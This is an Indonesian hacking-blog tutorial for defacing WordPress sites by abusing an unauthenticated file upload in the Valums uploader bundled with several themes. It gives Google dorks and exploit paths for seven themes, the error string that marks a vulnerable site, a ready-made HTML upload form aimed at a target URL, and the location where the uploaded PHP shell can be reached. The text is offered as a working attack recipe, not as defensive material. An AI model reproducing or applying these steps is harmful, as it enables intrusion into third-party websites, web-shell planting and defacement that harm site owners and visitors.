Deface dengan eXploit WordPress Valums Uploader Shell Upload

Author : UnknownTidak ada komentar





Tutorial Deface dengan eXploit WordPress Valums Uploader Shell Upload.
eXploit ini memanfaatkan Bug pada valums uploader di Themes nya.

1. Dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. Dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. Dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. Dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. Dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. Dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. Dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php


Cara nya Langsung ke Search ke Google pake Dork diatas.

Web Vuln ciri2nya kek gini.. ada tulisan {"error":"No files were uploaded.",



Langsung Buat CRSF pake notepad Save dengan ekstensi html


<form enctype="multipart/form-data"action="target.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="qqfile" type="file" /><br /><input type="submit" value="upload" /></form>

Kalo males buat bisa pake ini KlikDisini

Pake CSRF Mana aja bisa.. nih contoh web yg File nya sukses terupload.




Shell Akses file: /wp-content/uploads/tahun/bulan/namashell.php
contoh: target.com/wp-content/uploads/2016/12/nueenggak.php


Semoga bermanfaat .. terimakasih. Sampai ketemu di tutorial selanjutnya



Artikel Terkait

Posted On : Kamis, 05 Januari 2017Time : Januari 05, 2017
SHARE TO :
| | Template Created By : Binkbenks | CopyRigt By : Tutorial Hacker | |
close
Banner iklan disini
> [Tutup]